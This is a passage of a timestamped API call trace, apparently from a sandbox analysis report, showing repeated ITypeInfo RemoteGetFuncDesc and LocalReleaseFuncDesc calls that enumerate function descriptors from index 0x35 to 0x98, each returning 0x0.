(This=0x7f723a0) returned 0x0 [0045.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x35, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.246] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x36, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.246] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x37, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.246] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x38, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.246] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x39, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.246] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3a, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.246] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3b, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.246] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3c, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.246] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3d, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.246] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3e, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.246] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.246] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x3f, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.247] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x40, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.247] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x41, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.247] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x42, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.247] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x43, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.247] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x44, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.247] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x45, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.247] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x46, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.247] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x47, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.247] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x48, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.247] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x49, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.247] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4a, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.247] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4b, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.247] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4c, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.247] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4d, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.247] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4e, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.247] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x4f, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.247] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x50, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.247] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x51, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.247] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x52, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.248] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x53, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.248] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x54, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.248] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x55, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.248] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x56, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.248] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x57, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.248] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x58, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.248] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x59, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.248] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5a, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.248] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5b, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.248] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5c, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.248] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5d, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.248] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5e, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.248] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x5f, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.248] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x60, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.248] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x61, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.248] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x62, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.248] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x63, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.248] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x64, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.248] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x65, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.249] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.249] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x66, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.249] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.249] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x67, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.249] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.249] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x68, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.249] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.249] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x69, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.249] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.249] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6a, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.249] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.249] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6b, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.249] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.249] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6c, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.249] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.249] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6d, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.249] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.249] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6e, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.249] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.249] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x6f, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.249] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.249] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x70, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.249] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.249] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x71, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.249] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.249] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x72, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.249] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.249] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x73, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.249] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.249] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x74, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.249] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.249] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x75, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.249] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.249] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x76, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.249] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.249] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x77, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.250] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.250] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x78, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.250] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.250] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x79, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.250] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.250] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7a, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.250] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.250] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7b, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.250] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.250] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7c, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.250] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.250] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7d, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.250] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.250] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7e, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.250] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.250] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7f, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.250] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.250] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x80, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.250] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.250] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x81, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.250] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.250] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x82, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.250] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.250] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x83, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.250] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.250] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x84, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.250] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.250] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x85, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.250] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.250] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x86, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.250] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.250] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x87, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.250] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.250] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x88, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.250] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.250] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x89, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.251] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8a, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.251] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8b, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.251] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8c, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.251] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8d, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.251] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8e, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.251] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8f, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.251] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x90, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.251] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x91, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.251] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x92, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.251] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x93, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.251] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x94, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.251] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x95, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.251] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x96, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.251] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x97, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, pDummy=0x90) returned 0x0 [0045.251] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.251] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x98, ppFuncDesc=0x2060c8, pDummy=0x90 | out: ppFuncDesc=0x2060c8, 